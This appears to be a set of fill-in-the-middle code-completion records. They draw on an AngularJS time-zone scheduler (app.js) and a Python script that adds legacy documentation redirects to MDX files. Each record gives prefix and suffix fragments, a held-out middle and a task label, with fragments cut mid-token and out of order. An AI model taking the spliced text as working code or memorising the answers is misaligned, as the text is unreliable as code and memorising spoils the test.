return idx1 - idx2;
});
$scope.checkForToday();
}
};
$scope.$on('$locationChangeSuccess', $scope.syncWithURL);
window.setTimeout(function() {
$scope.ready = true;
$scope.syncWithURL();
$('div.loading').hide();
$('div.contentwrapper').fadeIn('slow', function() {
window.setInterval(function() {
if ($scope.updateClocks())
$scope.$apply();
}, 1000);
});
}, 100);
});
timesched.directive('timezone', function() {
return {
restrict: 'ACE',
require: 'ngModel',
scope: {
datasets: '=',
ngModel: '='
},
link: function(scope, elm, attrs, ctrl) {
var localChange = false;
elm.typeahead({
name: 'timezone',
local: SELECTABLES,
valueKey: 'd',
engine: {compile: function() {
return {
render: function(context) {
var time;
try {
time = moment.tz(context.z).format('HH:mm');
} catch (e) {
time = '??:??';
}
return '<p>' + context.d + '\u00a0<em>' + time + '</em></p>';
}
};
}},
template: 'dummy'
});
function updateScope() {
var oldVal = elm.val();
scope.$apply(function() {
localChange = true;
scope.ngModel = elm.val();
});
elm.val(oldVal);
}
elm.on('typeahead:selected', function() {
ctrl.$setValidity('timezone', true);
updateScope();
elm.trigger('submit');
});
elm.on('typeahead:autocompleted', updateScope);
elm.bind('input', function() {
scope.$apply(function() {
var value = elm.val();
if (zoneExists(value)) {
localChange = true;
ctrl.$setValidity('timezone', true);
scope.ngModel = value;
} else {
ctrl.$setValidity('timezone', false);
}
});
});
scope.$watch('ngModel', function(newVal) {
if (localChange) | {
localChange = false;
return;
} | conditional_block |
|
app.js | (zoneName) {
return zoneName.toLowerCase().replace(/^\s+|\s+$/g, '');
}
function zoneExists(input) {
return !!SELECTABLES_BY_NAME[normalizeZoneName(input)];
}
function lookupTimeZoneState(input) {
var zone = SELECTABLES_BY_NAME[normalizeZoneName(input)];
if (!zone) {
zone = SELECTABLES_BY_KEY[input];
if (!zone)
return null;
}
var m;
try {
m = moment.tz(normalizeZoneName(zone.z));
} catch (e) {
}
return m !== null ? new TimeZoneState(m, zone) : null;
}
timesched.setTimezoneData = function(data) {
SELECTABLES = [];
SELECTABLES_BY_NAME = {};
SELECTABLES_BY_KEY = {};
for (var i = 0; i < data.selectables.length; i++) {
var sel = data.selectables[i];
SELECTABLES.push(sel);
SELECTABLES_BY_NAME[sel.d.toLowerCase()] = sel;
SELECTABLES_BY_KEY[sel.k] = sel;
}
};
function TimeZoneState(m, zone) {
this.tz = m.tz();
this.urlKey = zone.k;
this.offset = 0;
this.timezoneShortName = zone.n;
this.timezoneName = zone.d;
this.update();
}
TimeZoneState.prototype.update = function(day, homeZone) {
var reftz = homeZone ? homeZone.tz : this.tz;
var start = moment.tz(day, reftz).startOf('day');
var ptr = start.clone().tz(this.tz);
var offset = (start.zone() - ptr.zone()) / 60;
this.dayStart = ptr.clone();
this.homeOffset = (offset > 0 ? '+' : '') + offset;
this.timezoneOffsetInfo = ptr.format('[UTC] Z');
this.utcOffset = ptr.zone();
this.timezoneAbbr = ptr.format('z');
this.isHome = homeZone && homeZone.tz === this.tz;
this.timeCells = [];
for (var i = 0; i < 24; i++) {
if (i !== 0)
ptr.add('hours', 1);
this.timeCells.push({
hour: parseInt(ptr.format('H'), 10),
hourFormat: ptr.format('H'),
minute: parseInt(ptr.format('m'), 10),
minuteFormat: ptr.format('mm'),
tooltip: ptr.format('LLLL (z)')
});
}
if (ptr.zone() !== this.utcOffset) {
var endAbbr = ptr.format('z');
var endOffsetInfo = ptr.format('[UTC] Z');
if (endAbbr != this.timezoneAbbr)
this.timezoneAbbr += '/' + endAbbr;
if (endOffsetInfo != this.timezoneOffsetInfo)
this.timezoneOffsetInfo += '/' + endOffsetInfo;
}
this.updateClock();
};
TimeZoneState.prototype.updateClock = function() {
var now = moment.tz(this.tz);
var oldH = this.clockHour;
var oldM = this.clockMinute;
this.clockHour = now.format('H');
this.clockMinute = now.format('mm');
return this.clockHour !== oldH || this.clockMinute !== oldM;
};
timesched.controller('TimezoneCtrl', function($scope, $location, datepickerConfig) {
$scope.day = new Date();
$scope.isToday = true;
$scope.zones = [];
$scope.homeZone = null;
$scope.currentZone = null;
$scope.ready = false;
$scope.timeRange = [40, 68];
$scope.scheduleMeeting = false;
$scope.meetingSummary = '';
// make the datepicker show monday by default
datepickerConfig.startingDay = 1;
$scope.addInputZone = function() {
if ($scope.addZone($scope.currentZone))
$scope.currentZone = '';
};
$scope.addZone = function(zoneName) {
var zoneState = lookupTimeZoneState(zoneName);
if (zoneState === null)
return false;
$scope.zones.push(zoneState);
$scope.updateZones();
return true;
};
$scope.setAsHome = function(zone) {
$scope.homeZone = zone;
$scope.updateZones();
$scope.saveState();
};
$scope.removeZone = function(zone) {
for (var i = 0, n = $scope.zones.length; i < n; i++) {
if ($scope.zones[i] !== zone)
continue;
$scope.zones.splice(i, 1);
if ($scope.homeZone === zone) {
$scope.homeZone = null;
$scope.updateZones();
}
break;
}
};
$scope.sortByOffset = function() {
$scope.sortByFunc(function(a, b) {
return b.utcOffset - a.utcOffset;
});
};
$scope.sortByName = function() {
$scope.sortByFunc(function(a, b) {
a = a.timezoneName.toLowerCase();
b = b.timezoneName.toLowerCase();
return a == b ? 0 : a < b ? -1 : 1;
});
};
$scope.sortByFunc = function(sortFunc) {
var copy = $scope.zones.slice(0);
copy.sort(sortFunc);
$scope.zones = copy;
};
$scope.updateClocks = function() {
var rv = false;
$scope.zones.forEach(function(zone) {
if (zone.updateClock())
rv = true;
});
var wasToday = $scope.isToday;
$scope.checkForToday();
return rv || (wasToday != $scope.isToday);
};
$scope.checkForToday = function() {
if ($scope.homeZone === null)
return;
var now = moment.tz($scope.homeZone.tz).format('YYYY-MM-DD');
var dayStart = moment.tz($scope.day, $scope.homeZone.tz).format('YYYY-MM-DD');
$scope.isToday = now == dayStart;
};
$scope.updateZones = function() {
if (!$scope.zones.length)
return;
if ($scope.homeZone === null)
$scope.homeZone = $scope.zones[0];
$scope.zones.forEach(function(zone) {
zone.update($scope.day, $scope.homeZone);
});
};
$scope.$watch('day', function() {
$scope.updateZones();
$scope.saveState();
});
$scope.$watch('scheduleMeeting', function() {
$scope.saveState();
});
$scope.$watch('timeRange', function() {
$scope.saveState();
});
$scope.$watchCollection('zones', function() {
$scope.saveState();
});
$scope.saveState = function() {
if (!$scope.ready)
return;
var buf = [];
for (var i = 0; i < $scope.zones.length; i++) {
var zone = $scope.zones[i];
var item = zone.urlKey;
if (zone.isHome)
item += '!';
buf.push(item);
}
var params = {};
params.date = moment($scope.day).format('YYYY-MM-DD');
if (buf.length > 0)
params.tz = buf.join(',');
if ($scope.scheduleMeeting)
params.range = $scope.timeRange[0] + ',' + $scope.timeRange[1];
if (params.tz != $location.search.tz ||
params.date != $location.search.date ||
params.range != $location.search.range)
$location.search(params);
if ($scope.scheduleMeeting)
$scope.updateMeetingSummary();
};
$scope.updateMeetingSummary = function() {
var lines = [];
var fmt = 'HH:mm ddd, MMM D YYYY';
for (var i = 0; i < $scope.zones.length; i++) {
var zone = $scope.zones[i];
var start = zone.dayStart.clone().add('minutes', $scope.timeRange[0] * 15);
var end = zone.dayStart.clone().add('minutes', $scope.timeRange[1] * 15);
if (i > 0)
lines.push('');
lines.push(zone.timezoneName + ' [' + start.format('z; [UTC]ZZ') +
(start.zone() != end.zone() ? '; timezone change' : '') + ']');
lines.push(start.format(fmt));
lines.push(end.format(fmt));
}
$scope.meetingSummary = lines.join('\n');
};
$scope.zonesDifferInURL = function(urlZones) {
if (urlZones.length != $scope.zones.length)
return true;
for (var i = 0; i < urlZones.length; i++) {
if (urlZones[i] !== $scope.zones[i].urlKey)
return true;
}
return false;
};
$scope.syncWithURL = function() {
var allZones = [];
var homeZone = null;
var params = $location.search();
var zones = (params.tz || '').split(',');
var dateChanged = false;
if (zones.length == 1 && zones[0] === '')
zones = [];
| normalizeZoneName | identifier_name |
|
add_legacy_redirects.py | and redirects:
written = written + 1
# print redirects at the end of the frontmatter
print('legacyRedirectsGenerated:')
print(' # This list is generated by a script. If you need add entries, use the `legacyRedirects` key.')
for redirect in redirects:
relative_redirect = redirect.split('https://www.enterprisedb.com')[1]
print(' - "{}"'.format(relative_redirect))
injected_redirects = True
in_frontmatter = True
# block existing legacyRedirects from being written back out
if line.startswith('legacyRedirectsGenerated:'):
in_existing_redirect_section = True
elif in_existing_redirect_section and not (line.startswith(' -') or line.lstrip().startswith('#')):
in_existing_redirect_section = False
if not in_existing_redirect_section:
print(line, end="")
return written
# These functions are only used by the commented out "old" url style handling
def title_from_frontmatter(filepath):
mdx_file = open(filepath)
for line in mdx_file:
if line.startswith('title:'):
mdx_file.close()
return line.split('title:')[1].strip().replace('"', '')
mdx_file.close()
def headings_from_mdx(filepath):
headings = [] | headings.append(
normalize_title(heading_re.sub('', line))
)
mdx_file.close()
return headings
def normalize_title(title):
title = re.sub(r'^\d*\.?\d*\.?\d*\.?\d*\s', '', title.strip())
title = re.sub(r'[\u2000-\u206F\u2E00-\u2E7F\\\'\-!"#$%&()*+,./:;<=>?@[\]^`{|}~’]', '', title)
title = title.lower().replace(' ', '').replace('*', '').replace('_', '').replace("\\", '').replace('™','').replace('®','')
return title
def determine_root_mdx_file(docs_path, mdx_folder = None):
root_path = docs_path
if mdx_folder:
root_path += '/{}'.format(mdx_folder)
index_path = root_path + '/index.mdx'
if not os.path.exists(index_path):
return None
return index_path
def print_report(report_dict):
for key in report_dict.keys():
value = report_dict[key]
print(ANSI_BOLD + key + ANSI_STOP)
if type(value) is defaultdict:
print_report(value)
else:
print(value)
def print_csv_report(report_dict):
print('Product,Version,Legacy Docs Folder')
for product, versions in report_dict.items():
for version, folders in versions.items():
for folder, urls in folders.items():
for url in urls:
print('{0},{1},{2},{3}'.format(product, version, folder, url))
metadata_file = open(os.path.dirname(__file__) + '/legacy_redirects_metadata.json')
legacy_metadata_by_product = json.load(metadata_file)
metadata_file.close()
json_file = open(os.path.dirname(__file__) + '/legacy_docs_scrape.json')
scraped_legacy_docs_json = json.load(json_file)
json_file.close()
json_file = open(os.path.dirname(__file__) + '/equivalent_versions.json')
equivalent_versions = json.load(json_file)
json_file.close()
legacy_urls_by_product_version = defaultdict(lambda : defaultdict(list))
for data in scraped_legacy_docs_json:
if data.get('product'):
legacy_urls_by_product_version[data.get('product')][data.get('version')].append(data)
processed_count = 0
matched_count = 0
new_count = 0
old_count = 0
missing_folder_count = 0
skipped = 0
no_files = 0
new_failed_to_match = []
new_failed_to_match_count = 0
old_failed_to_match = []
old_failed_to_match_count = 0
no_metadata = defaultdict(lambda : [])
version_missing = defaultdict(lambda : [])
missing_folder_metadata = defaultdict(lambda : defaultdict(set))
no_files_in_folder = defaultdict(lambda : defaultdict(set))
new_failed_to_match = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
old_failed_to_match = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
output = defaultdict(lambda : [])
for product in legacy_urls_by_product_version.keys():
product_data = legacy_urls_by_product_version[product]
for version in product_data.keys():
product_version_data = product_data[version]
effective_version = version
if product in equivalent_versions and version in equivalent_versions.get(product):
effective_version = equivalent_versions.get(product).get(version)
metadata = legacy_metadata_by_product.get(product)
if not metadata:
# no metadata configured for product
no_metadata[product].append(version)
continue
docs_path = 'product_docs/docs/{0}/{1}'.format(metadata['folder_name'], effective_version)
if not os.path.exists(docs_path):
# version does not match a version we have
version_missing[product].append(version)
continue
for legacy_page in product_version_data:
url = legacy_page['url']
if '/latest/' in url:
# skip latest urls if they appear, we'll handle those separately
continue
url_scheme = determine_url_scheme(url)
# if product version index page, can match right here
is_product_index = re.search(r'\/edb-docs\/p\/[\w-]+\/[\d.]+$', url)
if is_product_index:
index_path = determine_root_mdx_file(docs_path)
if index_path:
add_urls_to_output(url, index_path, output)
processed_count += 1
matched_count += 1
continue
legacy_folder = '/'.join(url.split('/')[6:8])
mdx_folder = metadata['subfolders'].get(version)
if mdx_folder:
mdx_folder = mdx_folder.get(legacy_folder)
else:
mdx_folder = metadata['subfolders'].get('default')
if mdx_folder:
mdx_folder = mdx_folder.get(legacy_folder)
if mdx_folder == 'skip':
skipped += 1
continue
else:
# At this point we'll say we're attempting to process this record for real
processed_count += 1
if mdx_folder == None: # don't want to catch empty string
# no metadata info for this folder
missing_folder_count += 1
missing_folder_metadata[product][version].add(legacy_folder)
continue
subfolder_docs_path = docs_path
if len(mdx_folder) > 0:
subfolder_docs_path = '{0}/{1}'.format(docs_path, mdx_folder)
if not os.path.exists(subfolder_docs_path):
# no files exist in this folder
no_files += 1
no_files_in_folder[product][version].add(subfolder_docs_path)
continue
subfolder_mdx_files = Path(subfolder_docs_path).rglob('*.mdx')
product_mdx_files = Path(docs_path).rglob('*.mdx')
match_found = False
if url_scheme == 'new':
new_count += 1
legacy_page_filename = url.split('/')[-1].replace('.html', '')
matched_file = []
for filename in subfolder_mdx_files:
mdx_page_filename = str(filename).split('/')[-1]
mdx_page_foldername = str(filename).split('/')[-2]
if (
mdx_page_filename == 'index.mdx' and
mdx_page_foldername != effective_version and
mdx_page_foldername != mdx_folder
):
mdx_page_filename = mdx_page_foldername
mdx_page_filename = re.sub(r'^\d*_', '', mdx_page_filename.replace('.mdx', ''))
if legacy_page_filename == mdx_page_filename:
add_urls_to_output(url, filename, output)
matched_count += 1
match_found = True
break # TODO handle duplicate url bug that affects some "new" style urls
# if no match found, check for files we remove
if legacy_page_filename in NEW_URLS_REMOVED_FILES:
index_path = determine_root_mdx_file(docs_path, mdx_folder)
if index_path:
add_urls_to_output(url, index_path, output)
matched_count += 1
match_found = True
if not match_found:
new_failed_to_match[product][version][mdx_folder].append(url)
new_failed_to_match_count += 1
# print('no match found for {}'.format(url))
else:
old_count += 1
legacy_title = normalize_title(legacy_page['title'])
legacy_parents = [normalize_title(t) for t in legacy_page['sub_nav']]
print('searching for {0} under {1} in {2}'.format(legacy_title, legacy_parents, subfolder_docs_path))
title_matches = []
heading_matches = []
heading_matches_exact = []
for filename in product_mdx_files:
mdx_title = normalize_title(title_from_frontmatter(filename))
mdx_headings = headings_from_mdx(filename)
if legacy_title == mdx_title:
if str(filename).startswith(subfolder_docs_path):
output[str(filename)].append(url)
matched_count += 1
match_found = True
break
else:
title_matches.append(filename)
| heading_re = re.compile(r'^#+ ')
mdx_file = open(filepath)
for line in mdx_file:
if heading_re.match(line): | random_line_split |
add_legacy_redirects.py | and redirects:
written = written + 1
# print redirects at the end of the frontmatter
print('legacyRedirectsGenerated:')
print(' # This list is generated by a script. If you need add entries, use the `legacyRedirects` key.')
for redirect in redirects:
relative_redirect = redirect.split('https://www.enterprisedb.com')[1]
print(' - "{}"'.format(relative_redirect))
injected_redirects = True
in_frontmatter = True
# block existing legacyRedirects from being written back out
if line.startswith('legacyRedirectsGenerated:'):
in_existing_redirect_section = True
elif in_existing_redirect_section and not (line.startswith(' -') or line.lstrip().startswith('#')):
in_existing_redirect_section = False
if not in_existing_redirect_section:
print(line, end="")
return written
# These functions are only used by the commented out "old" url style handling
def title_from_frontmatter(filepath):
mdx_file = open(filepath)
for line in mdx_file:
if line.startswith('title:'):
mdx_file.close()
return line.split('title:')[1].strip().replace('"', '')
mdx_file.close()
def headings_from_mdx(filepath):
headings = []
heading_re = re.compile(r'^#+ ')
mdx_file = open(filepath)
for line in mdx_file:
if heading_re.match(line):
headings.append(
normalize_title(heading_re.sub('', line))
)
mdx_file.close()
return headings
def normalize_title(title):
| determine_root_mdx_file(docs_path, mdx_folder = None):
root_path = docs_path
if mdx_folder:
root_path += '/{}'.format(mdx_folder)
index_path = root_path + '/index.mdx'
if not os.path.exists(index_path):
return None
return index_path
def print_report(report_dict):
for key in report_dict.keys():
value = report_dict[key]
print(ANSI_BOLD + key + ANSI_STOP)
if type(value) is defaultdict:
print_report(value)
else:
print(value)
def print_csv_report(report_dict):
print('Product,Version,Legacy Docs Folder')
for product, versions in report_dict.items():
for version, folders in versions.items():
for folder, urls in folders.items():
for url in urls:
print('{0},{1},{2},{3}'.format(product, version, folder, url))
metadata_file = open(os.path.dirname(__file__) + '/legacy_redirects_metadata.json')
legacy_metadata_by_product = json.load(metadata_file)
metadata_file.close()
json_file = open(os.path.dirname(__file__) + '/legacy_docs_scrape.json')
scraped_legacy_docs_json = json.load(json_file)
json_file.close()
json_file = open(os.path.dirname(__file__) + '/equivalent_versions.json')
equivalent_versions = json.load(json_file)
json_file.close()
legacy_urls_by_product_version = defaultdict(lambda : defaultdict(list))
for data in scraped_legacy_docs_json:
if data.get('product'):
legacy_urls_by_product_version[data.get('product')][data.get('version')].append(data)
processed_count = 0
matched_count = 0
new_count = 0
old_count = 0
missing_folder_count = 0
skipped = 0
no_files = 0
new_failed_to_match = []
new_failed_to_match_count = 0
old_failed_to_match = []
old_failed_to_match_count = 0
no_metadata = defaultdict(lambda : [])
version_missing = defaultdict(lambda : [])
missing_folder_metadata = defaultdict(lambda : defaultdict(set))
no_files_in_folder = defaultdict(lambda : defaultdict(set))
new_failed_to_match = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
old_failed_to_match = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
output = defaultdict(lambda : [])
for product in legacy_urls_by_product_version.keys():
product_data = legacy_urls_by_product_version[product]
for version in product_data.keys():
product_version_data = product_data[version]
effective_version = version
if product in equivalent_versions and version in equivalent_versions.get(product):
effective_version = equivalent_versions.get(product).get(version)
metadata = legacy_metadata_by_product.get(product)
if not metadata:
# no metadata configured for product
no_metadata[product].append(version)
continue
docs_path = 'product_docs/docs/{0}/{1}'.format(metadata['folder_name'], effective_version)
if not os.path.exists(docs_path):
# version does not match a version we have
version_missing[product].append(version)
continue
for legacy_page in product_version_data:
url = legacy_page['url']
if '/latest/' in url:
# skip latest urls if they appear, we'll handle those separately
continue
url_scheme = determine_url_scheme(url)
# if product version index page, can match right here
is_product_index = re.search(r'\/edb-docs\/p\/[\w-]+\/[\d.]+$', url)
if is_product_index:
index_path = determine_root_mdx_file(docs_path)
if index_path:
add_urls_to_output(url, index_path, output)
processed_count += 1
matched_count += 1
continue
legacy_folder = '/'.join(url.split('/')[6:8])
mdx_folder = metadata['subfolders'].get(version)
if mdx_folder:
mdx_folder = mdx_folder.get(legacy_folder)
else:
mdx_folder = metadata['subfolders'].get('default')
if mdx_folder:
mdx_folder = mdx_folder.get(legacy_folder)
if mdx_folder == 'skip':
skipped += 1
continue
else:
# At this point we'll say we're attempting to process this record for real
processed_count += 1
if mdx_folder == None: # don't want to catch empty string
# no metadata info for this folder
missing_folder_count += 1
missing_folder_metadata[product][version].add(legacy_folder)
continue
subfolder_docs_path = docs_path
if len(mdx_folder) > 0:
subfolder_docs_path = '{0}/{1}'.format(docs_path, mdx_folder)
if not os.path.exists(subfolder_docs_path):
# no files exist in this folder
no_files += 1
no_files_in_folder[product][version].add(subfolder_docs_path)
continue
subfolder_mdx_files = Path(subfolder_docs_path).rglob('*.mdx')
product_mdx_files = Path(docs_path).rglob('*.mdx')
match_found = False
if url_scheme == 'new':
new_count += 1
legacy_page_filename = url.split('/')[-1].replace('.html', '')
matched_file = []
for filename in subfolder_mdx_files:
mdx_page_filename = str(filename).split('/')[-1]
mdx_page_foldername = str(filename).split('/')[-2]
if (
mdx_page_filename == 'index.mdx' and
mdx_page_foldername != effective_version and
mdx_page_foldername != mdx_folder
):
mdx_page_filename = mdx_page_foldername
mdx_page_filename = re.sub(r'^\d*_', '', mdx_page_filename.replace('.mdx', ''))
if legacy_page_filename == mdx_page_filename:
add_urls_to_output(url, filename, output)
matched_count += 1
match_found = True
break # TODO handle duplicate url bug that affects some "new" style urls
# if no match found, check for files we remove
if legacy_page_filename in NEW_URLS_REMOVED_FILES:
index_path = determine_root_mdx_file(docs_path, mdx_folder)
if index_path:
add_urls_to_output(url, index_path, output)
matched_count += 1
match_found = True
if not match_found:
new_failed_to_match[product][version][mdx_folder].append(url)
new_failed_to_match_count += 1
# print('no match found for {}'.format(url))
else:
old_count += 1
legacy_title = normalize_title(legacy_page['title'])
legacy_parents = [normalize_title(t) for t in legacy_page['sub_nav']]
print('searching for {0} under {1} in {2}'.format(legacy_title, legacy_parents, subfolder_docs_path))
title_matches = []
heading_matches = []
heading_matches_exact = []
for filename in product_mdx_files:
mdx_title = normalize_title(title_from_frontmatter(filename))
mdx_headings = headings_from_mdx(filename)
if legacy_title == mdx_title:
if str(filename).startswith(subfolder_docs_path):
output[str(filename)].append(url)
matched_count += 1
match_found = True
break
else:
title_matches.append(filename)
| title = re.sub(r'^\d*\.?\d*\.?\d*\.?\d*\s', '', title.strip())
title = re.sub(r'[\u2000-\u206F\u2E00-\u2E7F\\\'\-!"#$%&()*+,./:;<=>?@[\]^`{|}~’]', '', title)
title = title.lower().replace(' ', '').replace('*', '').replace('_', '').replace("\\", '').replace('™','').replace('®','')
return title
def | identifier_body |
add_legacy_redirects.py | (output):
written = 0
for filepath in Path('product_docs/docs').rglob('*.mdx'):
redirects = output[str(filepath)]
in_frontmatter = False
injected_redirects = False
in_existing_redirect_section = False
for line in fileinput.input(files=[filepath], inplace=1):
if not injected_redirects and line.startswith('---'):
if in_frontmatter and redirects:
written = written + 1
# print redirects at the end of the frontmatter
print('legacyRedirectsGenerated:')
print(' # This list is generated by a script. If you need add entries, use the `legacyRedirects` key.')
for redirect in redirects:
relative_redirect = redirect.split('https://www.enterprisedb.com')[1]
print(' - "{}"'.format(relative_redirect))
injected_redirects = True
in_frontmatter = True
# block existing legacyRedirects from being written back out
if line.startswith('legacyRedirectsGenerated:'):
in_existing_redirect_section = True
elif in_existing_redirect_section and not (line.startswith(' -') or line.lstrip().startswith('#')):
in_existing_redirect_section = False
if not in_existing_redirect_section:
print(line, end="")
return written
# These functions are only used by the commented out "old" url style handling
def title_from_frontmatter(filepath):
mdx_file = open(filepath)
for line in mdx_file:
if line.startswith('title:'):
mdx_file.close()
return line.split('title:')[1].strip().replace('"', '')
mdx_file.close()
def headings_from_mdx(filepath):
headings = []
heading_re = re.compile(r'^#+ ')
mdx_file = open(filepath)
for line in mdx_file:
if heading_re.match(line):
headings.append(
normalize_title(heading_re.sub('', line))
)
mdx_file.close()
return headings
def normalize_title(title):
title = re.sub(r'^\d*\.?\d*\.?\d*\.?\d*\s', '', title.strip())
title = re.sub(r'[\u2000-\u206F\u2E00-\u2E7F\\\'\-!"#$%&()*+,./:;<=>?@[\]^`{|}~’]', '', title)
title = title.lower().replace(' ', '').replace('*', '').replace('_', '').replace("\\", '').replace('™','').replace('®','')
return title
def determine_root_mdx_file(docs_path, mdx_folder = None):
root_path = docs_path
if mdx_folder:
root_path += '/{}'.format(mdx_folder)
index_path = root_path + '/index.mdx'
if not os.path.exists(index_path):
return None
return index_path
def print_report(report_dict):
for key in report_dict.keys():
value = report_dict[key]
print(ANSI_BOLD + key + ANSI_STOP)
if type(value) is defaultdict:
print_report(value)
else:
print(value)
def print_csv_report(report_dict):
print('Product,Version,Legacy Docs Folder')
for product, versions in report_dict.items():
for version, folders in versions.items():
for folder, urls in folders.items():
for url in urls:
print('{0},{1},{2},{3}'.format(product, version, folder, url))
metadata_file = open(os.path.dirname(__file__) + '/legacy_redirects_metadata.json')
legacy_metadata_by_product = json.load(metadata_file)
metadata_file.close()
json_file = open(os.path.dirname(__file__) + '/legacy_docs_scrape.json')
scraped_legacy_docs_json = json.load(json_file)
json_file.close()
json_file = open(os.path.dirname(__file__) + '/equivalent_versions.json')
equivalent_versions = json.load(json_file)
json_file.close()
legacy_urls_by_product_version = defaultdict(lambda : defaultdict(list))
for data in scraped_legacy_docs_json:
if data.get('product'):
legacy_urls_by_product_version[data.get('product')][data.get('version')].append(data)
processed_count = 0
matched_count = 0
new_count = 0
old_count = 0
missing_folder_count = 0
skipped = 0
no_files = 0
new_failed_to_match = []
new_failed_to_match_count = 0
old_failed_to_match = []
old_failed_to_match_count = 0
no_metadata = defaultdict(lambda : [])
version_missing = defaultdict(lambda : [])
missing_folder_metadata = defaultdict(lambda : defaultdict(set))
no_files_in_folder = defaultdict(lambda : defaultdict(set))
new_failed_to_match = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
old_failed_to_match = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
output = defaultdict(lambda : [])
for product in legacy_urls_by_product_version.keys():
product_data = legacy_urls_by_product_version[product]
for version in product_data.keys():
product_version_data = product_data[version]
effective_version = version
if product in equivalent_versions and version in equivalent_versions.get(product):
effective_version = equivalent_versions.get(product).get(version)
metadata = legacy_metadata_by_product.get(product)
if not metadata:
# no metadata configured for product
no_metadata[product].append(version)
continue
docs_path = 'product_docs/docs/{0}/{1}'.format(metadata['folder_name'], effective_version)
if not os.path.exists(docs_path):
# version does not match a version we have
version_missing[product].append(version)
continue
for legacy_page in product_version_data:
url = legacy_page['url']
if '/latest/' in url:
# skip latest urls if they appear, we'll handle those separately
continue
url_scheme = determine_url_scheme(url)
# if product version index page, can match right here
is_product_index = re.search(r'\/edb-docs\/p\/[\w-]+\/[\d.]+$', url)
if is_product_index:
index_path = determine_root_mdx_file(docs_path)
if index_path:
add_urls_to_output(url, index_path, output)
processed_count += 1
matched_count += 1
continue
legacy_folder = '/'.join(url.split('/')[6:8])
mdx_folder = metadata['subfolders'].get(version)
if mdx_folder:
mdx_folder = mdx_folder.get(legacy_folder)
else:
mdx_folder = metadata['subfolders'].get('default')
if mdx_folder:
mdx_folder = mdx_folder.get(legacy_folder)
if mdx_folder == 'skip':
skipped += 1
continue
else:
# At this point we'll say we're attempting to process this record for real
processed_count += 1
if mdx_folder == None: # don't want to catch empty string
# no metadata info for this folder
missing_folder_count += 1
missing_folder_metadata[product][version].add(legacy_folder)
continue
subfolder_docs_path = docs_path
if len(mdx_folder) > 0:
subfolder_docs_path = '{0}/{1}'.format(docs_path, mdx_folder)
if not os.path.exists(subfolder_docs_path):
# no files exist in this folder
no_files += 1
no_files_in_folder[product][version].add(subfolder_docs_path)
continue
subfolder_mdx_files = Path(subfolder_docs_path).rglob('*.mdx')
product_mdx_files = Path(docs_path).rglob('*.mdx')
match_found = False
if url_scheme == 'new':
new_count += 1
legacy_page_filename = url.split('/')[-1].replace('.html', '')
matched_file = []
for filename in subfolder_mdx_files:
mdx_page_filename = str(filename).split('/')[-1]
mdx_page_foldername = str(filename).split('/')[-2]
if (
mdx_page_filename == 'index.mdx' and
mdx_page_foldername != effective_version and
mdx_page_foldername != mdx_folder
):
mdx_page_filename = mdx_page_foldername
mdx_page_filename = re.sub(r'^\d*_', '', mdx_page_filename.replace('.mdx', ''))
if legacy_page_filename == mdx_page_filename:
add_urls_to_output(url, filename, output)
matched_count += 1
match_found = True
break # TODO handle duplicate url bug that affects some "new" style urls
# if no match found, check for files we remove
if legacy_page_filename in NEW_URLS_REMOVED_FILES:
index_path = determine_root_mdx_file(docs_path, mdx_folder)
if index_path:
add_urls_to_output(url, index_path, output)
matched_count += 1
match_found = True
if not match_found:
new_failed_to_match[product][version][mdx_folder].append(url)
new_failed_to_match_count += 1
# print('no match found for {}'.format(url))
else:
old_count += 1
legacy_title = normalize_title(legacy_page['title'])
legacy_parents = [normalize_title(t) for t in legacy_page['sub_nav']]
print('searching for {0} under {1} in {2}'.format(legacy_title, legacy_parents, subfolder_docs_path))
title_matches = []
heading_matches = []
| write_redirects_to_mdx_files | identifier_name |
|
add_legacy_redirects.py | redirects:
written = written + 1
# print redirects at the end of the frontmatter
print('legacyRedirectsGenerated:')
print(' # This list is generated by a script. If you need add entries, use the `legacyRedirects` key.')
for redirect in redirects:
relative_redirect = redirect.split('https://www.enterprisedb.com')[1]
print(' - "{}"'.format(relative_redirect))
injected_redirects = True
in_frontmatter = True
# block existing legacyRedirects from being written back out
if line.startswith('legacyRedirectsGenerated:'):
in_existing_redirect_section = True
elif in_existing_redirect_section and not (line.startswith(' -') or line.lstrip().startswith('#')):
in_existing_redirect_section = False
if not in_existing_redirect_section:
print(line, end="")
return written
# These functions are only used by the commented out "old" url style handling
def title_from_frontmatter(filepath):
mdx_file = open(filepath)
for line in mdx_file:
if line.startswith('title:'):
mdx_file.close()
return line.split('title:')[1].strip().replace('"', '')
mdx_file.close()
def headings_from_mdx(filepath):
headings = []
heading_re = re.compile(r'^#+ ')
mdx_file = open(filepath)
for line in mdx_file:
if heading_re.match(line):
headings.append(
normalize_title(heading_re.sub('', line))
)
mdx_file.close()
return headings
def normalize_title(title):
title = re.sub(r'^\d*\.?\d*\.?\d*\.?\d*\s', '', title.strip())
title = re.sub(r'[\u2000-\u206F\u2E00-\u2E7F\\\'\-!"#$%&()*+,./:;<=>?@[\]^`{|}~’]', '', title)
title = title.lower().replace(' ', '').replace('*', '').replace('_', '').replace("\\", '').replace('™','').replace('®','')
return title
def determine_root_mdx_file(docs_path, mdx_folder = None):
root_path = docs_path
if mdx_folder:
root_path += '/{}'.format(mdx_folder)
index_path = root_path + '/index.mdx'
if not os.path.exists(index_path):
return None
return index_path
def print_report(report_dict):
for key in report_dict.keys():
value = report_dict[key]
print(ANSI_BOLD + key + ANSI_STOP)
if type(value) is defaultdict:
print_report(value)
else:
print(value)
def print_csv_report(report_dict):
print('Product,Version,Legacy Docs Folder')
for product, versions in report_dict.items():
for version, folders in versions.items():
for folder, urls in folders.items():
for url in urls:
print('{0},{1},{2},{3}'.format(product, version, folder, url))
metadata_file = open(os.path.dirname(__file__) + '/legacy_redirects_metadata.json')
legacy_metadata_by_product = json.load(metadata_file)
metadata_file.close()
json_file = open(os.path.dirname(__file__) + '/legacy_docs_scrape.json')
scraped_legacy_docs_json = json.load(json_file)
json_file.close()
json_file = open(os.path.dirname(__file__) + '/equivalent_versions.json')
equivalent_versions = json.load(json_file)
json_file.close()
legacy_urls_by_product_version = defaultdict(lambda : defaultdict(list))
for data in scraped_legacy_docs_json:
if data.get('product'):
legacy_urls_by_product_version[data.get('product')][data.get('version')].append(data)
processed_count = 0
matched_count = 0
new_count = 0
old_count = 0
